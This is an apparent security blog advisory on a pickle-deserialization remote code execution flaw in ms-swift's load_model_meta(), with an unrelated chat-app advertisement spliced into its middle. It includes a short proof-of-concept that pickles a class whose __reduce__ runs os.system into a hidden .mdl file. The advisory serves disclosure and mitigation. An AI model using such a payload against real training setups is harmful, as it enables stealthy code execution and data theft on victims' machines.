Overview
CVE-2025-50472 is a critical vulnerability that resides in the modelscope/ms-swift library up to and including version 2.6.1. The vulnerability allows an attacker to execute arbitrary code remotely by exploiting the deserialization of untrusted data in the `load_model_meta()` function. This flaw poses a serious threat to any system running the vulnerable software, potentially leading to system compromise or leakage of sensitive data.
The vulnerability is particularly concerning due to the stealthy nature of its exploitation. The malicious payload is hidden, and the normal training process remains unaffected even after the arbitrary code execution, making it extremely difficult for the user to detect any malicious activities. This blog post offers a detailed analysis of the vulnerability, its potential impact, and the steps necessary to mitigate its risks.
Vulnerability Summary
CVE ID: CVE-2025-50472
Severity: Critical (CVSS 9.8)
Attack Vector: Network
Privileges Required: None
User Interaction: Required
Impact: System Compromise, Potential Data Leakage
Affected Products
Escape the Surveillance Era
Most apps won’t tell you the truth.
They’re part of the problem.
Phone numbers. Emails. Profiles. Logs.
It’s all fuel for surveillance.
Ameeba Chat gives you a way out.
- • No phone number
- • No email
- • No personal info
- • Anonymous aliases
- • End-to-end encrypted
Chat without a trace.
Product | Affected Versions
modelscope/ms-swift | <= 2.6.1 How the Exploit Works
The vulnerability exploits the `load_model_meta()` function of the `ModelFileSystemCache()` class in the modelscope/ms-swift library. This function uses `pickle.load()` to deserialize data from potentially untrusted sources.
An attacker can craft a malicious serialized `.mdl` payload and deceive the victim into loading it during a normal training process. This subsequently allows the attacker to execute arbitrary code on the targeted machine. The payload file is hidden, making it difficult for the victim to notice any tampering. Moreover, the normal training process remains unaffected even after the arbitrary code execution, leaving the user unaware of the exploit.
Conceptual Example Code
While the actual exploit code is complex and beyond the scope of this blog post due to its malicious nature, a conceptual example might look something like this:
import pickle
import os
# Malicious code to be executed
class Exploit(object):
def __reduce__(self):
return (os.system, ('<arbitrary command>',))
# Serialize malicious code into .mdl payload
with open('.hidden_mdl_payload.mdl', 'wb') as file:
pickle.dump(Exploit(), file)
In this conceptual example, the `Exploit` class defines a `__reduce__` method that, when unpickled, results in the execution of an arbitrary command. This malicious `.mdl` file is then loaded unsuspectingly by the victim during the normal training process, leading to arbitrary code execution.